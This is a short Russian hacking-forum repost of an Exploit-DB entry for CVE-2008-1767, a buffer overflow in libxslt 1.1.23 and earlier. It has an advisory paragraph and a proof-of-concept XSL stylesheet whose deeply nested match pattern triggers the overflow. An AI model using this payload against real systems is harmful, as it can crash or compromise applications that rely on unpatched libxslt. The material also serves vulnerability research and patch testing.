Exploit libxslt XSL 1.1.23 - File Processing Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31815
Проверка EDB
  1. Пройдено
Автор
ANTHONY DE ALMEIDA LOPES
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2008-1767
Дата публикации
2008-05-21
HTML:
source: https://www.securityfocus.com/bid/29312/info

The 'libxslt' library is prone to a buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will likely result in denial-of-service conditions.

This issue affects libxslt 1.1.23 and prior versions. 

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="xml"/>

<xsl:template
match="html/body/table/tr/td/div/div/div/div/div/div/div/div/table/tr/td/table/tr/td/p/b">
<xsl:if test="contains(text(), 'published')">
<found/>
</xsl:if>
</xsl:template>
</xsl:stylesheet>
 
Источник
www.exploit-db.com

Похожие темы